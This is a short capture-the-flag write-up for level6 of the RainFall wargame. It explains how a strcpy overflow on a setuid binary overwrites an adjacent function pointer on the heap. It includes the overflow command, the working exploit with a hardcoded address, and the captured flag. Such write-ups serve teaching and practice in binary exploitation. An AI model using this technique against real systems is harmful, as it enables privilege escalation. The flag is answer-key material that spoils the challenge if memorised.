After login we see next information:
```
  GCC stack protector support:            Enabled
  Strict user copy checks:                Disabled
  Restrict /dev/mem access:               Enabled
  Restrict /dev/kmem access:              Enabled
  grsecurity / PaX: No GRKERNSEC
  Kernel Heap Hardening: No KERNHEAP
 System-wide ASLR (kernel.randomize_va_space): Off (Setting: 0)
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/level6/level6
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 level7 users 5274 Mar  6  2016 level6
```

Using `objdump` and `radar` tools find out that there are three functions inside `main`, `n` and `m`.
![alt text](./Resources/main.png "main function")
![alt text](./Resources/n.png "n function")
![alt text](./Resources/m.png "m function")

As we can see in `main` function allocated two small blocks of memmory - 64 bytes buffer to hold first argument, 4 bytes to hold pointer to a function. As those two block really small, there are a posibility that they lays one by one in memmory. Interesting thing that before call function from pointer there used unsecure `strcpy` (which doesn't control number of copied characters), so I can try to override value inside variable which hold function pointer.

Found `n` function address using `objdump` tool.

I prepared an argument for `level6` binary - start payload from 65 bytes and increase it until segfault will occur ( that means that I overrode function pointer address ).
```
level6@RainFall:~$ ./level6 $(python -c 'print "A" * 72' )
Segmentation fault (core dumped)
```

Exploit:
```
level6@RainFall:~$ ./level6 $(python -c 'print "A" * 72 + "\x54\x84\x04\x08"' )
f73dcb7a06f60e3ccc608990b0a046359d42a1a0489ffeefd0d9cb2d7c9cb82d
```

Flag: `f73dcb7a06f60e3ccc608990b0a046359d42a1a0489ffeefd0d9cb2d7c9cb82d`